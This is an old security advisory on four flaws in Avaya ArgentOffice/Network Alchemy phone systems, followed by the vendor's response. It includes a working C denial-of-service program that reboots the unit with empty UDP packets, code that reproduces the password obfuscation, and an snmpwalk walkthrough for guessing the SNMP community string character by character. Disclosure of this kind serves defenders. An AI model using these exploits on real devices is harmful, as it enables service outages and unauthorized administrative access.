|
Brought to you by:
Suppliers of:
|
|
|
| |
| The ArgentOffice branch of products (now known as Network Alchemy line) from Avaya are a solution integrating a PBX, network connectivity, dial on demand networking and more. The product contains multiple security vulnerabilities that allow attackers to cause the program to no logger provide service, gain elevated privileges and modify the current configuration of the product. All of these security vulnerabilities are only possible on a local network (this system is designed for small offices), so they should not be much of a problem, but still these might pose a problem in some originations or configurations. |
| |
Credit:
The information has been provided by Jacek Lipkowski and Russ Garrett.
|
| |
1. Local denial of service:
By sending a UDP packet to port 53 with no payload cause the Argent Office to reboot. The unit gets up very quickly, so in order to cause a denial of service one needs to send a large amount of packets repeatedly.
Exploit:
/* argent_kill.c
(c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
Reboots an Argent Office box by sending udp packets with no payload to port 53
usage: argent_kill ip_address
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
main(int argc, char *argv[])
{
struct sockaddr_in addr;
struct hostent *host;
int s;
s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (s==-1) { perror("socket()"); exit(1); }
host=gethostbyname(argv[1]);
if (host==0) { herror("gethostbyname"); exit(1); }
memcpy(&addr.sin_addr,host->h_addr,host->h_length);
addr.sin_port=htons(53);
addr.sin_family=AF_INET;
if (connect(s,&addr,16)==-1) { perror("connect()"); exit(1); }
for (;;)
{
send(s,0,0,0); sleep(1); printf("."); fflush(stdout);
}
close(s);
}
2. Easily decryptable configuration password
Configuring Argent Office consists of a strange TFTP look-alike. For example to reboot a unit, one must get via TFTP the following file:
nasystem/rebootwhenfree/00e007002666/password//
Where 00e007002666 is the MAC address of the unit and password is the obfuscated password. Since this packet is easily sniffed and the obfuscation algorithm does not change, anyone with a sniffer can easily obtain administrative privileges. The obfuscation mechanism is rather simple, as the following example demonstrates:
Exploit:
/* argent_obfuscate.c
(c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
Demonstrates how the password obfuscation mechanism works in argent office products */
main(int argc,char **argv)
{
int i;
unsigned char buf[32];
strcpy(&buf,argv[1]);
for (i=0;i<strlen(argv[1]);i++)
printf("0x%2.2X ",buf[i]+0x11-i);
printf("\n");
}
Show the hex values for the password 'idiocy':
~$ ./argent_obfuscate idiocy
0x7A 0x74 0x78 0x7D 0x70 0x85
3. SNMP handling
The software does SNMP authentication via something similar to:
if (strncmp(n,c,strlen(n))==0) { ok, valid community}
Where c is the community string and n is the community string from the network.
So if the size of the password in the packet is 0 then the authentication is always ok.
~$ snmpwalk 192.168.1.234 "" system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
This would allow you to guess the community string character by character.
Example:
For guessing the first letter:
~$ snmpwalk 192.168.1.234 a system.sysDescr.0
Timeout: No Response from 192.168.1.234
[the first letter is not a]
[several combinations later, is it p?]
~$ snmpwalk 192.168.1.234 p system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
[ok we have the first letter, lets go for the second]
~$ snmpwalk 192.168.1.234 pa system.sysDescr.0
Timeout: No Response from 192.168.1.234
[the second letter is not a]
[several combinations later, is it r?]
~$ snmpwalk 192.168.1.234 pr system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
Etc...
After a small amount of combinations we find out that, the community is 'private'
While not much is gained by using SNMP, the community may be some company standard, and knowing it may open other doors.
4. Broadcast TFTP requests
The system in its default configuration requests a file called HoldMusic via TFTP to the broadcast address. You could serve this file and change your company's music on hold tune to something else.
Vendor response:
1) Fixed in Argent Branch/Office 2.2.60
2) Password can be cracked. Hacker needs to be on local LAN.
The who-is packet can be filtered by use of a switching device placed between directly between PBX and all non trusted users, or by ensuring the Manager only resides on the local Subnet and all users of this local subnet are "trusted".
3) The SNMP community string used for the Alchemy/IP Office range of Equipment is [Public]. This is hard coded and cannot be changed. So no real threat here, as if other devices on Network are configurable via SNMP (which the Alchemy/IP Office isn't) then they should be set to the customers real community string and NOT [Public].
4) Yes the TFTP request for Hold Music uses broadcast address 255.255.255.255 This will only reach PC's on the local subnet if on a routed network. If someone on your local net has a TFTP Server or Manager running then the IT guy should know about it. If you feel it is a problem place a switching device on the local subnet so only the PC required to respond to this broadcast can see it. Down to administration of local LAN I would suggest.
|
|
|
|
|
